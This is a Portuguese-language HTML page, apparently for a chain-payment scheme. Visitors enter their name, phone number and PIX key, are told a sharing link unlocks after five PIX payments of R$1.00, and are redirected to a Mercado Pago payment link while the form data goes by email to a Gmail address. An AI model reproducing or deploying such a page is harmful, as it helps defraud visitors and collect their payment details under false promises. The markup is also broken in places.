<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//PT-BR">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> 
</select>
<form action="http://formmail.kinghost.net/formmail.cgi" method="POST"> 

<style>
body {font-family: Arial, Helvetica, sans-serif;}

/* The Modal (background) */
.modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    padding-top: 100px; /* Location of the box */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
    position: relative;
    background-color: #fefefe;
    margin: auto;
    padding: 0;
    border: 1px solid #888;
    width: 80%;
    box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
    -webkit-animation-name: animatetop;
    -webkit-animation-duration: 0.4s;
    animation-name: animatetop;
    animation-duration: 0.4s
}

/* Add Animation */
@-webkit-keyframes animatetop {
    from {top:-300px; opacity:0} 
    to {top:0; opacity:1}
}

@keyframes animatetop {
    from {top:-300px; opacity:0}
    to {top:0; opacity:1}
}

/* The Close Button */
.close {
    color: white;
    float: right;
    font-size: 28px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: #000;
    text-decoration: none;
    cursor: pointer;
}

.FINALIZACAO {
    padding: 2px 16px;
    background-color: #5cb85c;
    color: white;
}

.modal-body {padding: 2px 16px;}

.modal-footer {
    padding: 2px 16px;
    background-color: #5cb85c;
    color: white;
}
</style>
<script>
function funcao1()
{
alert("que bom que chegamos aqui vamos compartilhar.\n \nFAZER GIRAR o PIX!");
}
</script>
</head>
<body>
<img src="557.jpeg" alt="some" width="350" height="150">

<h2></h2>
<p style="text-align: center;">
<b>FINALIZACAO<br>
<p>
<b>NOME 
<input type="text" size="18" name="NOME" placeholder="Nome">


   <div class="6u 12u$(xsmall)">
<b>TELEFONE 
<input type="tel" size="18" name="telefone" placeholder="Nome"><br><br>
<b>PIX
<input type="text" size="18" name="NOME" placeholder="pix"><br><br><br><br><br><br><br>
<p style="text-align: center">

<input type="submit" name="" value="ENVIAR" select="button alt" onclick="funcao1()" value="Exibir Alert" >
<!-- Trigger/Open The Modal -->
<button id="myBtn">REGRAS</button>

<!-- The Modal -->
<div id="myModal" class="modal">

  <!-- Modal content -->
  <div class="modal-content">
    <div class="FINALIZACAO">
      <span class="close">&times;</span>
      <h2>Modal Header</h2>
    </div>
    <div class="modal-body">
      <p>certifique que seu dados estam corrento</p>
      <p>aguarde seu link de compartilhamento ser gerado</p>
      <p> apos a conferencia do 5 pix de R$ 1.00 sera liberado o link</p>
      <p> nao Esqueca de manda seu cadasto</p>
    </div>
    <div class="modal-footer">
    
      <h3>Modal Footer </p>
    </div>
  </div>

</div>

<script>
// Get the modal
var modal = document.getElementById('myModal');

// Get the button that opens the modal
var btn = document.getElementById("myBtn");

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks the button, open the modal 
btn.onclick = function() {
    modal.style.display = "block";
}

// When the user clicks on <span> (x), close the modal
span.onclick = function() {
    modal.style.display = "none";
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>
</select>
<form action="http://formmail.kinghost.net/formmail.cgi" method="POST">  
 <input type="hidden" name="recipient" value="multijogo1980@gmail.com">  
 
 
 <input type="hidden" name="redirect" value="https://link.mercadopago.com.br/multijogo"> 
 
 
 <input type="hidden" name="subject" value="Assunto" <input type="hidden" name="email" value="gmail.com">



<input maxlength="5"class="form-control input-lg" id="disabledInput" name="total" type="hidden" placeholder="R$"readonly=" disabled">


<input maxlength="5"id="n1" type="hidden"a name="hiddentotal" value="1">
<span class="input-group-addon"></span>
<br>
<br>
<input  maxlength="2" type="hidden" size="8"name="valor" value="" placeholder="R$"autocomplete="off" onchange="this.form.total.value=checkChoice(this);"></label>
 <label class="btn btn-default">
</body>
</html>
